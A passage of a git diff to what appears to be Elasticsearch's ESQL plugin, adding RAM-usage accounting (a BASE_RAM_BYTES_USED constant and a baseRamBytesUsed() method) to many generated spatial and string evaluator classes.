 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StGeohexToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexToStringFromLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator gridId;
 
  public StGeohexToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId,
@@ -101,6 +104,13 @@ public void close() {
     Releasables.closeExpectNoException(gridId);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += gridId.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java
index 13a8da4ad0c9c..dd1f3c28f8253 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
*/ public final class StGeotileFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator in; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock inBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java index f5b6f4b503373..a2c0f64dbbf1c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class StGeotileFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator wkbBlock; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkbBlock.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java index c6dc1d23b9f3d..3cc470bae6de9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java index 93acf7bd2badc..9d965914fbea8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class StGeotileFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldDocValuesAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -46,6 +49,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java index b99abc16e62f8..04ea23fdfbc64 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class StGeotileToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileToLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeotileToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -103,6 +106,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java index aece0da62cd23..6f45f7aea646a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeotileToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileToStringFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeotileToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -101,6 +104,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java index a29c7a9db4a5a..92fac3ff4c73f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. 
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public StXFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java index a63b6feaf838b..ad6d9f43046f6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMaxFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMaxFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMaxFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java index 2b05369d62ef1..62dd60fe286eb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class StXMaxFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMaxFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMaxFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java index f457bb8170e89..c8d3942689680 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMinFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMinFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMinFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java index 56421bd391d33..98155fa1c9f2e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class StXMinFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMinFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMinFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java index 0f3347d6d34fb..a2e25b9a40cf6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public StYFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java index 7121a9abe0a99..eecf029a4b722 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class StYMaxFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMaxFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMaxFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java index a0041df774c83..73add8d49053b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMaxFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMaxFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMaxFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java index b8ac6a10f84e3..b5459287be404 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class StYMinFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMinFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMinFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java index 9d10fd812ceca..f29787e75fb43 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMinFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMinFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMinFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java index acf9613b29e7a..f3f79b3facbd4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.automaton.ByteRunAutomaton; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
